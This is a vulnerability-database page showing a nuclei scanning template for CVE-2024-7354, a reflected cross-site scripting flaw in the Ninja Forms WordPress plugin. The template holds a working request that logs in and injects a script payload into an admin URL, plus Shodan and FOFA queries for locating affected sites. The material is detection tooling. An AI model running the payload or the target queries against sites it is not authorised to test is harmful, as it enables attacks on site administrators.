Lucene search
K

Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Ninja Forms 3.8.6-3.8.10 Cross-Site Scripting on WordPres

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-7354
2 Sep 202412:12
circl
CNNVD
WordPress plugin Ninja Forms 安全漏洞
2 Sep 202400:00
cnnvd
CVE
CVE-2024-7354
2 Sep 202406:00
cve
Cvelist
CVE-2024-7354 Ninja Forms 3.8.6-3.8.10 - Reflected XSS
2 Sep 202406:00
cvelist
NVD
CVE-2024-7354
2 Sep 202408:15
nvd
OSV
CVE-2024-7354
2 Sep 202408:15
osv
Patchstack
Wordpress Ninja Forms plugin 3.8.6 - 3.8.10 - Reflected XSS
3 Sep 202400:47
patchstack
Positive Technologies
PT-2024-38285 · WordPress · Ninja Forms
1 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-7354
23 May 202510:25
redhatcve
Vulnrichment
CVE-2024-7354 Ninja Forms 3.8.6-3.8.10 - Reflected XSS
2 Sep 202406:00
vulnrichment
Rows per page
id: CVE-2024-7354

info:
  name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
  impact: |
    Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update the plugin to Latest version. Fixed in 3.8.11.
  reference:
    - https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7354
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-7354
    cwe-id: CWE-79
    epss-score: 0.00662
    epss-percentile: 0.47214
    cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: ninjaforms
    product: ninja_forms
    framework: wordpress
    fofa-query: body="/wp-content/plugins/ninja-forms"
    publicwww-query: /wp-content/plugins/ninja-forms/
    shodan-query: http.html:"/wp-content/plugins/ninja-forms/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/ninja-forms"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=nf-submissions&"><script>alert(document.domain)</script>=2 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: content_type_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206a98595c469009b069b5d985158476be96dc751a1e8080f4e6f68639d30521e6022100c24dc2a6737e2aac6aba98f3f79e2da4d1a72683870c15f2ca52459a57401ab3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00662
SSVC
22